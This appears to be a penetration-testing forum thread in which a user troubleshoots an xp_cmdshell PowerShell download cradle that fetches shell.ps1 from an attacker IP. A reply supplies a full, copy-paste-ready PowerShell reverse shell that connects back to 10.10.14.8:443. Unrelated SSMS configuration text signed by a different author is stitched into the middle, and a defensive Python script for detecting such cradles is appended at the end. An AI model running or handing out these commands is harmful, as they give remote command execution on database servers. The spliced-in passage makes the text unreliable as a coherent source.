xp_cmdshell error

SQL> xp_cmdshell "powershell "IEX (New-ObjectNet.WebClient).DownloadString("http://10.10.15.159/shell.ps1\");"
output


New-ObjectNet.WebClient : The term 'New-ObjectNet.WebClient' is not recognized as the name of a cmdlet, function,
script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is
correct and try again.
At line:1 char:6
+ IEX (New-ObjectNet.WebClient).DownloadString("http://10.10.15.159/she
+      ~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo : ObjectNotFound: (New-ObjectNet.WebClient:String) , CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException

I am getting this error, please help.

PowerShell is saying New-ObjectNet.WebClient is incorrect. It is saying this because there is no PowerShell object named New-ObjectNet.WebClient.

Did you mean:
New-Object Net.WebClient
?

How can I solve this error?

@metin1655 said:

How can I solve this error?

Have you tried correcting the typo?

Yes, I did, thanks,
but now another mistake.

That looks like something in shell.ps1 isn't coded correctly.

The error is saying it doesn’t like the ampersand in: iex$data2>&1

Without knowing what your shell.ps1 contains, my first guess would be it is the exact same typo. The bit should probably read: iex $data 2>&1

Spaces really do matter. If you are copying/pasting from an online guide, it might be badly formatted.

thanks I’ll try

this time this

I can’t believe I can finish this

@metin1655 said:

Resim Yükle - Hızlı Resim - Resim Paylaş - Resmim.Net

this time this

I can’t believe I can finish this

There is no screenshot at that link.

You might find it easier to copy and paste the text. That way you can quickly see if there is a space missing, which is overwhelmingly likely to be the problem.

sorry
https://resimyukle.xyz/i/5G17VB

It says the module can’t be loaded. That implies something is wrong with how the system is interacting with powershell.

Which box is it? Because there might be something you need to do first, or this might not be the correct path.

@metin1655 said:

sorry
https://resimyukle.xyz/i/5G17VB

I haven’t passed this error yet

@metin1655 said:

@metin1655 said:

sorry
https://resimyukle.xyz/i/5G17VB

I haven’t passed this error yet

It says the module can’t be loaded. That implies something is wrong with how the system is interacting with powershell.

Which box is it? Because there might be something you need to do first, or this might not be the correct path.

@TazWake said:
That looks like something in shell.ps1 isn't coded correctly.

The error is saying it doesn’t like the ampersand in: iex$data2>&1

Without knowing what your shell.ps1 contains, my first guess would be it is the exact same typo. The bit should probably read: iex $data 2>&1

Spaces really do matter. If you are copying/pasting from an online guide, it might be badly formatted.

Going to post the correct syntax shell.ps1 here, with appropriate spacing (copy and paste friendly).

$client = New-Object System.Net.Sockets.TCPClient("10.10.14.8",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.close()

VERY IMPORTANT - after TCPClient, replace the IP with your IP!

From within SSMS, right click on the instance name and select Facets.

In the Facet dropdown, change to Server Security as shown below.

Enabled as needed to either True or False. After changing the value, click OK to save the setting and the change will take effect immediately. There is not a need to enable show advanced options or use reconfigure, the GUI takes care of this automatically.

Regards,
Rachel Gomez
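
The same activity seen from the detection side, as an added example that is not part of the thread: xp_cmdshell runs its argument through cmd.exe as a child of sqlservr.exe, so the command from the first post (typo included) shows up in process-creation logs. Field names follow Sysmon Event ID 1; the sample events, the install path, the 192.0.2.10 address and the severity labels are constructed for illustration.

```python
import re

# Constructed sample events (field names as in Sysmon Event ID 1, process creation).
SQL = r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe"  # assumed path
SAMPLE_EVENTS = [
    {"ParentImage": SQL, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c powershell IEX (New-ObjectNet.WebClient)"
                    ".DownloadString('http://10.10.15.159/shell.ps1')"},
    {"ParentImage": SQL, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c dir C:\backup"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-ChildItem"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -c iex (New-Object Net.WebClient)"
                    ".DownloadString('http://192.0.2.10/a.ps1')"},
]

# Download-cradle markers. \s* (not \s+) so the thread's failed attempt,
# "New-ObjectNet.WebClient", is still caught even though it never ran.
CRADLE_PATTERNS = {
    "webclient": re.compile(r"new-object\s*(system\.)?net\.webclient", re.I),
    "download": re.compile(r"\.download(string|file|data)\s*\(", re.I),
    "iex": re.compile(r"\b(iex|invoke-expression)\b", re.I),
}

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the list of findings for one process-creation event."""
    findings = []
    # xp_cmdshell executes commands via cmd.exe spawned by the SQL Server process.
    if (basename(event["ParentImage"]) == "sqlservr.exe"
            and basename(event["Image"]) == "cmd.exe"):
        findings.append("xp_cmdshell-child")
    hits = [n for n, rx in CRADLE_PATTERNS.items() if rx.search(event["CommandLine"])]
    if len(hits) >= 2:  # require two markers to cut noise from a lone 'iex'
        findings.append("download-cradle")
    return findings

def severity(event):
    """high = cradle launched through xp_cmdshell; medium = either one alone."""
    found = classify(event)
    if len(found) == 2:
        return "high"
    return "medium" if found else None
```
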